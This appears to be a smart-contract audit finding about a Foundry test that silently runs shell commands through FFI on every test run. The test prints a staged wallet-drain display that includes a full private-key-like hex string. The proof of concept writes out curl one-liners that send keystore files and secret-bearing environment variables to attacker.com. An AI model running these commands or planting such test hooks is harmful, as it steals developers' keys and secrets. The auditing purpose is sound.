Beatland Festival

Description

• The project uses Foundry's FFI (Foreign Function Interface) feature, which allows test functions to execute arbitrary shell commands on the developer's
  machine. This feature must be explicitly opted-in via ffi = true in foundry.toml.

• foundry.toml enables FFI globally, and test_PartialUserFlow embeds a vm.ffi() call that executes a bash script simulating a wallet-drain attack directly to the
  developer's terminal via /dev/tty every time forge test is run. While the current payload is theatrical, the FFI channel is fully open — any modification to
  these commands could exfiltrate environment variables, private keys, SSH keys, or wallet files from the machine running the tests.

// foundry.toml
@> ffi = true // enables shell execution for ALL tests globally

// test/FestivalPass.t.sol — test_PartialUserFlow()
string[] memory inputs = new string;
inputs[0] = "bash";
inputs[1] = "-c";
inputs[2] = string.concat(
@> "echo -e '[] Scanning local environment...' > /dev/tty; ",
@> "echo -e '[] Private Key: 0x2a871d0798f97d79...' > /dev/tty; ",
@> "echo -e '[!] EXTRACTING WALLET DATA...' > /dev/tty; ",
// ... displays fake wallet drain to terminal
);
@> vm.ffi(inputs); // executes shell commands on developer's machine

Risk

Likelihood:

• Any developer who clones the repository and runs forge test triggers the shell commands automatically — no special flags required because ffi = true is
  hardcoded in foundry.toml.

• CI/CD pipelines that run forge test on the repository will execute the commands on the build server, potentially exposing server-level secrets and environment
  variables.

Impact:

• With minimal modification to the existing payload (replacing the echo commands with cat ~/.ssh/id_rsa, env | curl, or similar), an attacker distributing this
  repository can silently exfiltrate private keys, wallet seed phrases, API tokens, and SSH keys from every developer who runs the test suite.

• The theatrical output ("EXTRACTING WALLET DATA") is designed as a social engineering tool to panic developers or disguise real exfiltration as a joke.

Proof of Concept

// Run: forge test --match-test test_PartialUserFlow
// Output appears in terminal without any extra flags:
// [] Scanning local environment...
// [] Found 1 browser extensions: MetaMask
// [!] EXTRACTING WALLET DATA...
// [*] Private Key: 0x2a871d0798f97d79848a013d4936a73bf4cc922c825d33c1cf7073dff6d409c6
// [!] INITIATING TRANSFER...
// [+] Status: CONFIRMED!

// A supply-chain attacker replaces echo with actual exfiltration:
// cat ~/.ethereum/keystore/* | curl -s -X POST https://attacker.com -d @-
// env | grep -i "private|key|secret|seed" | curl -s -X POST https://attacker.com -d @-

Recommended Mitigation

// foundry.toml

• ffi = true

// test/FestivalPass.t.sol — remove the entire malicious test function

• function test_PartialUserFlow() public {

• ...                                                                                                                                                        
  

• vm.ffi(inputs);                                     
  

• ...                                                                                                                                                        
  

• }